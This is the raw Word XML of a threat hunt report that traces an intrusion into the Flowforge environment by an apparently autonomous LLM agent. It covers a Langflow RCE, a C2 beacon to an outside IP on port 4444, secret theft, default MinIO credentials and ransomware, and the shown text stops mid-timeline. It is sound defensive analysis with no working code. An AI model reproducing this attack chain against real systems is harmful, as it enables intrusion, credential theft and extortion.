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05"/>
        <w:pBdr/>
        <w:spacing w:after="60"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hunt 23: JadePuffer</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="60"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Agentic Ransomware Intrusion on Flowforge</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="300"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Philip Zangara | Threat Hunt Report | LAW-HuntPractice | Microsoft Sentinel (KQL)</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="706"/>
        <w:pBdr/>
        <w:spacing w:after="120" w:before="300"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Executive Summary</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I worked as a threat hunter investigating an analytics rule that fired on ff-lf-01 at 19:21 UTC. A service account had started a process it had never run before. I traced the chain back to an unaut</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">henticated remote code execution exploit against Langflow, and forward through credential theft, lateral movement, privilege escalation, and a ransomware payoff against the production database. The whole operation ran in about 17 minutes across four hosts.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The intruder was an autonomous LLM agent, not a human operator. A single human</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> instruction started the session. Everything after that, including diagnosing and fixing its own failed privilege escalation attempt, ran without further human input. I confirmed this from the session structure in the agent's own logs, not from assumption.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I found what I could support with telemetry and said so plainly where I could not. The encryption key was never persisted anywhere in this</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> environment. Which containers the intruder saw during its Docker socket probe cannot be established, because the container runtime log only records the request, not the response, and I confirmed that gap holds across the entire table, not just this event.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="706"/>
        <w:pBdr/>
        <w:spacing w:after="120" w:before="300"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Timeline</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00"/>
        <w:gridCol w:w="1500"/>
        <w:gridCol w:w="6560"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="1f3864"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Time (UTC)</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="1f3864"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Host</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="1f3864"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="6560" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Event</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">19:20:00</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-lf-01</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="6560" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">POST /api/v1/validate/code from 64.20.53.230, unauthenticated</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">19:20:04</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-lf-01</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="6560" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">RCE via CVE-2025-3248, python3 -c &lt;base64 payload&gt; spawned as langflow</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">19:22:04</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-lf-01</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="6560" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">C2 beacon opens to 45.131.66.106:4444</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">19:25:05</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-lf-01</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="6560" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Langflow's own Postgres DB dumped, 214 secrets extracted</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">19:27:04</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-db-01</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="6560" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Nightly backup runs (legitimate, backup account, unrelated)</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">19:27:29</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-lf-01</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="6560" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Second interpreter (PID 4491) runs a 10.4.0.0/24 subnet sweep</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">19:27:39</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-minio-01</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="6560" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">MinIO accessed with factory creds minioadmin:minioadmin</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">19:30:35</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-minio-01</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="6560" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">credentials.json pulled from the terraform-state bucket</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">19:34:36</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-nacos-01</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="6560" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
